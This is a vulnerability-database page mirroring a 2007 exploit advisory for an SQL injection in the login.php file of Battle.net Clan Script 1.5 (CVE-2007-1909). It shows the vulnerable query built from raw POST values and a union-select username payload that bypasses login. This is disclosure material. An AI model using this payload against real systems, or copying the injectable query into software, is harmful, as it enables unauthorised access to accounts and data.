Lucene search
+L

Battle.net Clan Script for PHP 1.5.1 - SQL Injection

🗓️ 09 Apr 2007 00:00:00Reported by h a c k e r _ XType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

Battle.net Clan Script 1.5 Login SQL Injectio

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-1909
10 Apr 200723:00
cve
cvelist
Cvelist
CVE-2007-1909
10 Apr 200723:00
cvelist
euvd
EUVD
EUVD-2007-1903
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-1909
10 Apr 200723:19
nvd
prion
Prion
Sql injection
10 Apr 200723:19
prion
securityvulns
securityvulns
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
12 Apr 200700:00
securityvulns
****************************************

script : Battle.net Clan Script 1.5
file : login.php
attack : injection sql

auteur : h a c k e r _ X

***************************************

code :
------------------------------------------------------------------------------------------

line 9 --> $user = $_POST['user'];
line 10--> $pass = $_POST['pass'];

.....
.....
.....

line 21--> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link);
*******

-------------------------------------------------------------------------------------------------


exploit :
*******

Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*
password : enything





************************************************** *
thinks to : max007,simo64,brutalism and all marocains hackers

special thinks for "P Y N S S O"

************************************************** *

# milw0rm.com [2007-04-09]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.01061
26